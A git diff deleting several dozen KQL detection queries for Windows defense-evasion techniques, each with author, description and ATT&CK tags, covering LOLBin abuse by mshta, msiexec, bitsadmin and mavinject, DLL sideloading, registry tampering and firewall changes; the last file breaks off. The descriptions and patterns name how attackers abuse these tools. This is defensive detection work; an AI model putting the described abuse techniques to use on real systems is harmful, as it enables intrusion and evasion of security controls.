diff --git a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql
deleted file mode 100644
index 2dc54c90..00000000
--- a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /HideWMP" and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql b/Defense Evasion/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql b/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql
deleted file mode 100644
index b3590a9b..00000000
--- a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql b/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql
deleted file mode 100644
index 96432dcf..00000000
--- a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
-// Date: 2020/10/14
-// Level: medium
-// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
-This option may be used adversaries to execute malicious code by signed verified binary.
-The debugger is installed alongside with Microsoft Visual Studio package.
-
-// Tags: attack.t1218, attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql b/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql
deleted file mode 100644
index a7baffeb..00000000
--- a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/13
-// Level: low
-// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
-Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql b/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql b/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql
deleted file mode 100644
index 894acf23..00000000
--- a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/19
-// Level: low
-// Description: Detects changes to the "MaxMpxCt" registry value.
-MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
-Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
-
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql b/Defense Evasion/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql b/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql
deleted file mode 100644
index f541d3c2..00000000
--- a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/06/08
-// Level: high
-// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
deleted file mode 100644
index 49fbaa43..00000000
--- a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql b/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql
deleted file mode 100644
index fc3958d8..00000000
--- a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, frack113
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Modification_of_IE_Registry_Settings.kql b/Defense Evasion/Modification_of_IE_Registry_Settings.kql
deleted file mode 100644
index b0b1e710..00000000
--- a/Defense Evasion/Modification_of_IE_Registry_Settings.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: low
-// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryKey contains "\\Accepted Documents" or RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision"))))
\ No newline at end of file
diff --git a/Defense Evasion/Modify_Group_Policy_Settings.kql b/Defense Evasion/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Defense Evasion/Modify_Group_Policy_Settings.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql b/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql
deleted file mode 100644
index 0c15a4a8..00000000
--- a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql	
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
-When the job runs on the system the command specified in the BITS job will be executed.
-This can be abused by actors to create a backdoor within the system and for persistence.
-It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
-
-// Tags: attack.defense_evasion, attack.t1197
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
deleted file mode 100644
index 3f152c7d..00000000
--- a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/Defense Evasion/MsiExec_Web_Install.kql b/Defense Evasion/MsiExec_Web_Install.kql
deleted file mode 100644
index 15d8a634..00000000
--- a/Defense Evasion/MsiExec_Web_Install.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/09
-// Level: medium
-// Description: Detects suspicious msiexec process starts with web addresses as parameter
-// Tags: attack.defense_evasion, attack.t1218.007, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/Defense Evasion/Msiexec_Quiet_Installation.kql b/Defense Evasion/Msiexec_Quiet_Installation.kql
deleted file mode 100644
index e47c0886..00000000
--- a/Defense Evasion/Msiexec_Quiet_Installation.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q")) and (not(((ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Msxsl.EXE_Execution.kql b/Defense Evasion/Msxsl.EXE_Execution.kql
deleted file mode 100644
index 5adad169..00000000
--- a/Defense Evasion/Msxsl.EXE_Execution.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
-Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql b/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql
deleted file mode 100644
index fd8baf44..00000000
--- a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/11/18
-// Level: high
-// Description: Detects changes to the NGenAssemblyUsageLog registry key.
-.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
-By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql b/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql
deleted file mode 100644
index 016f8720..00000000
--- a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), wagga
-// Date: 2018/03/20
-// Level: high
-// Description: Detects NetNTLM downgrade attack
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "SYSTEM" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (RegistryKey endswith "\\lmcompatibilitylevel" or RegistryKey endswith "\\NtlmMinClientSec" or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql b/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql
deleted file mode 100644
index fa2fb1a9..00000000
--- a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql
deleted file mode 100644
index 36f8079b..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
-This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql
deleted file mode 100644
index fece3237..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql
deleted file mode 100644
index 8e765072..00000000
--- a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql
deleted file mode 100644
index 1b6b673e..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql
deleted file mode 100644
index ec618a77..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "4" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql
deleted file mode 100644
index 24312dbc..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "6" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql
deleted file mode 100644
index bc970aa2..00000000
--- a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql
deleted file mode 100644
index 1fa50c1c..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 13f2830a..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/New_File_Association_Using_Exefile.kql b/Defense Evasion/New_File_Association_Using_Exefile.kql
deleted file mode 100644
index 51ab4c8a..00000000
--- a/Defense Evasion/New_File_Association_Using_Exefile.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/11/19
-// Level: high
-// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 0e1275cd..00000000
--- a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the addition of a new rule to the Windows firewall via netsh
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0246
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql b/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
